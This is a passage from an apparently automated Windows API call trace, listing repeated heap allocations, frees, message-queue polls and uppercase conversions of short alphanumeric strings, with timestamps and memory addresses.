(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b80) returned 0x2a83840 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0090.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0090.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0090.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0090.163] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0090.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0090.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0090.163] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0090.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0090.164] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0090.164] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.164] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0090.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0090.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0090.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0090.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0090.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0090.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0090.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0090.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.166] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0090.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0090.166] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0090.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0090.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0090.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0090.167] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.167] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0090.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0090.167] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0090.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0090.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0090.167] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0090.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0090.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0090.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0090.168] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0090.168] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.168] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0090.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74508 [0090.168] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0090.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0090.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0090.168] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0090.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0090.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0090.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0090.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0090.169] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0090.169] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74508 | out: hHeap=0x2af0000) returned 1 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0090.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0090.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0090.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0090.170] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0090.170] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0090.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.170] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0090.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0090.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748b0 [0090.170] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.170] RtlAllocateHeap 